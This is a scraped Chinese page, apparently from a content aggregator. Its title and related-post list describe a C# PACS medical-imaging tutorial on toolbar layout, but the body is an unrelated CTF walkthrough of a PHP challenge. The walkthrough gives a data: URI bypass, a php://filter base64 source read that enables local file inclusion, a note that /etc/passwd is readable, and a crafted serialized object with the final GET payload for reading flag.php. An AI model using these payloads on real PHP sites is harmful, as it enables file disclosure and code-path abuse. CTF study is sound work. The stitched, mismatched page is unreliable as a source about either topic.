2. 程式人生 > 實用技巧 >C#開發PACS醫學影像處理系統(三):介面佈局之工具欄

C#開發PACS醫學影像處理系統(三):介面佈局之工具欄

阿新 發佈:2020-09-11

題目

拿到題目

分析

第一個繞過

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

file_get_contents($text,'r')是讀取檔案的內容,說明我們首先要上傳一個檔案,並且它的內容還得是"welcome to the zjctf",我們考慮用data協議,data協議通常是用來執行PHP程式碼,然而我們也可以將內容寫入data協議中然後讓file_get_contents函式取讀取。構造如下:

data:text/plain,welcome to the zjctf

第二個繞過

$file = $_GET["file"];
if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }

這裡有file引數可控,但是無法直接讀取flag,可以直接讀取/etc/passwd,但針對php檔案我們需要進行base64編碼,否則讀取不到其內容,所以以下無法使用,

所以下面採用filter來讀原始碼,但上面提到過針對php檔案需要base64編碼,所以使用其自帶的base64過濾器。

php://filter/read=convert.base64-encode/resource=useless.php

讀到的useless.php內容如下:

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents
 
($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三個繞過

$password = $_GET["password"];
include($file);  //useless.php
$password = unserialize($password);
echo $password;

我們進行序列化

<?php
class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
print(serialize(new Flag()));
?>

結果:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最後的payload:

text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

相關推薦

C#開發PACS醫學影像處理系統()介面佈局工具

工具佈局採用WPF中Grid作為容器,按鈕採用自定義樣式和圖示,並採用Separator分割線

C#開發PACS醫學影像處理系統(四)介面佈局狀態列

狀態列一般用於顯示系統狀態,例如影像數量統計、CPU和記憶體使用情況、全屏時顯示日期等,

C#開發PACS醫學影像處理系統(七)讀取影像Dicom資訊

Dicom的檔案資訊一般是由裝置資訊、影象資訊、病人資訊等Tag標記組成的,用位元組長度和偏移量來區分,

C#開發PACS醫學影像處理系統(六)載入Dicom影像

對於一款軟體的擴充套件性和維護性來說,上層業務邏輯和UI表現一定要自己開發才有控制權,否則專案上線之後容易被掣肘,

C#開發PACS醫學影像處理系統(八)單元格變換

先看效果 再看結構,Viewer(影像控制元件)分為N個Cell(單元格),每個單元格分為N個Box(影像容器),

C#開發PACS醫學影像處理系統(十)Dicom影像下載策略與演算法

1.傳輸協議 當我們PACS客戶端接收到下載命令時需要根據dcm檔案的url來下載,這裡推薦使用http協議,支援大檔案的斷點續傳。

C#開發PACS醫學影像處理系統(十三)繪圖處理病灶測量

接上一篇文章,當我們可以繪製圖形標記後,就可以在此操作類上面進行擴充套件,

C#開發PACS醫學影像處理系統(十四)處理Dicom影像窗寬窗位

概念解釋(網路資料) 窗寬 窗寬指CT影象所顯示的CT 值範圍。在此CT值範圍內的組織結構按其密度高低從白到黑分為16 個灰階以供觀察對比。例如,窗寬選定為100 Hu ,則人眼可分辨的CT值為100 / 16 =6 . 25 Hu ,即

C#開發PACS醫學影像維重建(一):使用VTK重建3D影像

VTK簡介 VTK是一個開源的免費軟體系統,主要用於維計算機圖形學、影象處理和視覺化。Vtk是在面向物件原理的基礎上設計和實現的,它的核心是用C++構建的。

C#開發PACS醫學影像維重建(十三):基於人體CT值從面板漸變到骨骼的梯度透明思路

當我們將CT切片重建為維體之後,通常會消除一些不必要的外部組織來觀察內部病灶,

C#開發PACS醫學影像維重建(十三):基於人體CT值從面板漸變到骨骼的梯度透明思路 C#開發PACS醫學影像維重建(十三):基於人體CT值從面板漸變到骨骼的梯度透明思路

C#開發PACS醫學影像維重建(十三):基於人體CT值從面板漸變到骨骼的梯度透明思路

基於西門子PLC和觸控式螢幕以及C#開發的通用IO監控系統

前言: 在專案開發的過程之中,經常需要做IO監控畫面.當IO監控點多的時候,往往需要做很多的畫面,並且浪費了HMI的很多IO點.做起畫面來也很麻煩和繁瑣.從而,讓我思考著如何做一個工具.可以在一個畫面上監控所有的變數.

聯影集團釋出首款高階醫學影像專用“中國晶片”190 皮秒級世界突破

6 月 19 日訊息 聯影集團宣佈,今年 5 月份,首款高階醫學影像專用“中國芯”重磅釋出。它的成功研發打破了行業長期以來依賴進口通用晶片的歷史格局,填補我國在超高階醫療裝備領域自研專用晶片的空白,並在關鍵技術

自然語言處理4-4語言模型模型評估perplexity

perplexity可以用來評估訓練的語言模型的好壞,其實就是下面這個公式 $$perplexity = 2^{-x}\\qquad x表示的是平均的log likelihood,也可以理解為平均的概率啦$$

自然語言處理4-5語言模型平滑操作

為什麼需要平滑操作 假設有一個預料集 我 喜歡 喝 奶茶 我 喜歡 吃 巧克力 我 喜歡 健身

移動端佈局 flex佈局

flex佈局原理 http://www.ruanyifeng.com/blog/2015/07/flex-grammar.html 1.佈局原理 flex是flexible Box的縮寫,意為\"彈性佈局\" ,用來為盒狀模型提供最大的靈活性,任何-個容器都可以指定為flex佈局

Redis學習筆記()Redis應用投票、紅包

技術標籤Redisredis Redis基本資料型別及基本命令的使用都已經做完筆記了,接下來就需要將這些筆記實際運用到專案中。經常在專案中用到的就是快取常量資料,還有一些基本的計數等操作,比如我的部落格裡面訪問

vuevue基礎v-if和v-show

v-show和v-if1.v-show這個是一次性會把所有的都渲染出來,然後通過簡單的切換display值來修改是否需要被渲染。所以在需要頻繁切換的情況下推薦使用。v-show不能在template標籤上使用。2. v-if真正的條件渲染。

十分鐘學會Lua程式設計技巧閉包與模式匹配

程式設計技巧 1、 閉包 簡單來說,一個閉包就是一個函式外加能夠使該函式正確地訪問非區域性變數所需的其他機制。

Spring IOC原始碼()IOC容器 建立容器

1、原始碼解析   obtainFreshBeanFactory()方法包含了 Spring的IOC容器 - DefaultListableBeanFactory物件的建立、解析配置檔案中的bean資訊載入至容器中。